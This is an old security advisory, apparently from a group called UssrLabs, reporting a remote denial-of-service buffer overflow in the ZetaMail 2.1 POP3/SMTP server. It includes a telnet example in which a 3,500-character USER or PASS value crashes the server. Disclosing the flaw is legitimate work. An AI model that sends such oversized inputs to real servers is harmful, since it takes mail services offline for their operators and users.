u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h

Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability

ZetaMail 2.1	ZetaMail 2.1 mail server
Binary D.o.s (windows) Source of Binary D.o.s (windows) Source of Binary D.o.s (linux)	PROBLEM UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail POP3/SMTP Server. The buffer overflow is caused by a long user name/password, 3500 characters. There is not much to expand on.... just a simple hole Example: [gimmemore@itsme]$ telnet example.com 110 Trying example.com... Connected to example.com. Escape character is '^]'. +OK ZetaMail for 95 BD0211 4294764405.063903189415041@itsme> USER {buffer) +OK Send password PASS {buffer) Overflow Crashh. Where (buffer) is 3500 characters. Vendor Status: Contacted. Credit: USSRLABS SOLUTION Install another program from the same vendor, MsgCore/95 2.11, MsgCore/NT 2.10 u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h